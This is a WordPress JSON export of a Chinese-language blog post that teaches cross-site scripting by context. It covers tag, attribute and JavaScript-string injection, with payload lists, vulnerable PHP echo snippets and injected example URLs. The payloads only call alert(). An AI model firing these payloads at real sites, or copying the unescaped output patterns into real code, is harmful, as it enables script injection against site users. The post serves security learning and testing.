{"id":250,"date":"2020-08-09T17:03:03","date_gmt":"2020-08-09T09:03:03","guid":{"rendered":"http:\/\/note.systw.net\/note\/?p=250"},"modified":"2024-02-21T19:56:06","modified_gmt":"2024-02-21T11:56:06","slug":"xss-contexts","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/250","title":{"rendered":"XSS contexts"},"content":{"rendered":"\n

XSS contexts<\/h3>\n

\u5e38\u898b\u7684Cross-site scripting context Breaking
\n*XSS between HTML tags
\n*XSS in HTML tag attributes
\n*XSS into JavaScript<\/p>\n

\u00a0<\/p>\n

\n

XSS between HTML tags<\/h3>\n

HTML Context
\nCase: < tag>You searched for $input. < \/tag><\/p>\n

$input example:\n< svg onload=alert()>\n< \/tag>< svg onload=alert()>\n< script>alert(document.domain)< \/script>\n< img src=1 onerror=alert(1)>\n<\/code><\/pre>\n
ex:
\n\u6b63\u5e38\u7db2\u5740
\nhttp:\/\/xsswebsite\/xss.php<\/code>
\n\u6b63\u5e38\u539f\u78bc
\nHello, < ?=$_GET[\u201cname\u201d]?>!<\/code><\/p>\n
\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165XSS
\nhttp:\/\/xsswebsite\/xss.php?name=< svg onload=alert(1)><\/code>
\n\u56e0\u70ba\u539f\u78bc\u6703\u6539\u8b8a\u5982\u4e0b
\nHello, < svg onload=alert(1)>!<\/code><\/p>\n
\u00a0<\/p>\n
\n
XSS in HTML tag attributes<\/h3>\n
Attribute Context
\nCase: < tag attribute=\u201c$input\u201d><\/p>\n
$input example:\n">< svg onload=alert()>\n">< svg onload=alert()>< b attr="\n" onmouseover=alert() "\n"onmouseover=alert()\/\/\n"autofocus\/onfocus="alert()\n<\/code><\/pre>\n
URL Reflection<\/h4>\n
ex:
\n\u6b63\u5e38\u7db2\u5740
\nhttp:\/\/xsswebsite\/xss.php
\n\u6b63\u5e38\u539f\u78bc
\n< form action=\u201d< ?=$_SERVER[\u201cPHP_SELF\u201d]?>\u201d method=\u201dPOST\u201d><\/code><\/p>\n
\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165XSS
\nhttp:\/\/xsswebsite\/xss.php\/\u201d>< svg onload=alert(1)><\/code>
\nps:\n\u4ee5\u4e0a\u53ef\u80fd\u6703\u88abbrowser XSS filtering\u64cb\u4f4f<\/p>\n
\u56e0\u70ba\u539f\u78bc\u6703\u6539\u8b8a\u5982\u4e0b
\n< form action=\u201d\/xss.php\/\u201d>< svg onload=alert(1)>\u201d method=\u201dPOST\u201d><\/code><\/p>\n
\u00a0<\/p>\n
Tag Breaking\u5728\u91cd\u5efa\u65b0tag<\/h4>\n
ex:
\n\u6b63\u5e38\u7db2\u5740
\nhttp:\/\/xsswebsite\/xss.php?b1=1<\/code>
\n\u6b63\u5e38\u539f\u78bc
\n< input type="text" name="b1" value="< ?=$_GET[\u2018b1\u2019]?>"><\/code><\/p>\n
\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165XSS
\nhttp:\/\/xsswebsite\/xss.php?b1=">< svg onload=alert(1)><\/code>
\n\u56e0\u70ba\u539f\u78bc\u6703\u6539\u8b8a\u5982\u4e0b
\n< input type="text" name="b1" value="">< svg onload=alert(1)>"><\/code><\/p>\n
\u00a0<\/p>\n
No Tag Breaking<\/h4>\n
ex:
\n\u6b63\u5e38\u7db2\u5740
\nhttp:\/\/xsswebsite\/xss.php?b3=1<\/code>
\n\u6b63\u5e38\u539f\u78bc
\n< input type="text" name="b3" value="< ?=filtertag($_GET[\u201cb3\u201d])?>"><\/code>
\n\/\/filtertag() \u6703\u628a < \u548c > \u904e\u6ffe<\/p>\n
\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165XSS
\nhttp:\/\/xsswebsite\/xss.php?b3=\u201d onmouseover=alert(1)\/\/<\/code><\/p>\n
\u56e0\u70ba\u539f\u78bc\u6703\u6539\u8b8a\u5982\u4e0b\uff0c\u5de6\u908a\u628a\u96d9\u5f15\u865f\u9589\u5408\uff0c\u53f3\u908a\u96d9\u5f15\u865f\u900f\u904e\u96d9\u659c\u7dda\u8b8a\u6210\u8a3b\u89e3\uff0c
\n\u7576\u53d7\u5bb3\u8005\u79fb\u5230\u6b64\u8f38\u5165\u6846\u6642\u89f8\u767c\u5f48\u7a97
\n< input type="text" name="b3" value="\u201d onmouseover=alert(1)\/\/"><\/code><\/p>\n
\u00a0<\/p>\n
\n
XSS into JavaScript<\/h3>\n
JavaScript Context
\nCase: < script> var new something = \u2018$input\u2019; < \/script><\/p>\n
$input example:\n'-alert()-'\n'-alert()\/\/'\n'}alert(1);{'\n'}%0Aalert(1);%0A{'\n< \/script>< svg onload=alert()>\n<\/code><\/pre>\n
\u9589\u5408\u539f\u672cjs tag<\/h4>\n
ex:
\n\u6b63\u5e38\u7db2\u5740
\nhttp:\/\/xsswebsite\/xss.php?v1=1<\/code>
\n\u6b63\u5e38\u539f\u78bc
\n< script>  var v1 = '< ?=$_GET[\u201cv1\u201d]?>';  < \/script><\/code><\/p>\n
\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165XSS
\nhttp:\/\/xsswebsite\/xss.php?v1=< \/script>< svg onload=alert(1)><\/code><\/p>\n
\u56e0\u70ba\u539f\u78bc\u6703\u6539\u8b8a\u5982\u4e0b\uff0c
\n< script> var v1 = '< \/script>< svg onload=alert(1)>'; < \/script><\/code><\/p>\n
\u00a0<\/p>\n
\u9589\u5408\u55ae\u5f15\u865f\u4e26\u4f7f\u7528-\u7b26\u865f\u9023\u63a5js code<\/h4>\n
ex:
\n\u6b63\u5e38\u7db2\u5740
\nhttp:\/\/brutelogic.com.br\/xss.php?v3=1<\/code>
\n\u6b63\u5e38\u539f\u78bc
\n< script>  var v3 = '';  < \/script><\/code>
\n\/\/filterjstag() \u6703\u628ajavascript tag\u904e\u6ffe<\/p>\n
\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165XSS
\nhttp:\/\/brutelogic.com.br\/xss.php?v3='-alert(1)-'<\/code><\/p>\n
\u56e0\u70ba\u539f\u78bc\u6703\u6539\u8b8a\u5982\u4e0b
\n< script>  var v3 = ' '-alert(1)-' '; < \/script><\/code><\/p>\n
\u00a0<\/p>\n
Escaped Js<\/h4>\n
ex:
\n\u6b63\u5e38\u7db2\u5740
\nhttp:\/\/brutelogic.com.br\/xss.php?v5=1<\/code>
\n\u6b63\u5e38\u539f\u78bc
\n< script>  var v5 = '< ?=filterjstagv2($_GET[\u201cv5\u201d])?>';  < \/script><\/code>
\n\/\/filterjstagv2() \u6703\u628ajavascript tag\u548c\u55ae\u5f15\u865f\u904e\u6ffe<\/p>\n
\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165XSS
\nhttp:\/\/brutelogic.com.br\/xss.php?v5='-alert(1)-\/\/<\/code><\/p>\n
\u56e0\u70ba\u539f\u78bc\u6703\u6539\u8b8a\u5982\u4e0b\uff0c\u5de6\u908a\u7528\u53cd\u659c\u7dda\u8df3\u812b\u55ae\u5f15\u865f\uff0c\u53f3\u908a\u7528\u96d9\u659c\u7dda\u5c07\u55ae\u5f15\u865f\u8b8a\u8a3b\u89e3
\n< script> var v5 = ''-alert(1)-\/\/'; < \/script><\/code><\/p>\n
\u00a0<\/p>\n
\n
\u00a0<\/p>\n
refer
\nhttps:\/\/github.com\/s0md3v\/AwesomeXSS
\nhttps:\/\/portswigger.net\/web-security\/cross-site-scripting\/contexts
\nhttps:\/\/www.anquanke.com\/post\/id\/86585
\nhttps:\/\/brutelogic.com.br\/blog\/the-7-main-xss-cases-everyone-should-know\/<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[40],"tags":[],"class_list":["post-250","post","type-post","status-publish","format-standard","hentry","category-clientside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/250","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=250"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/250\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=250"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=250"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=250"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}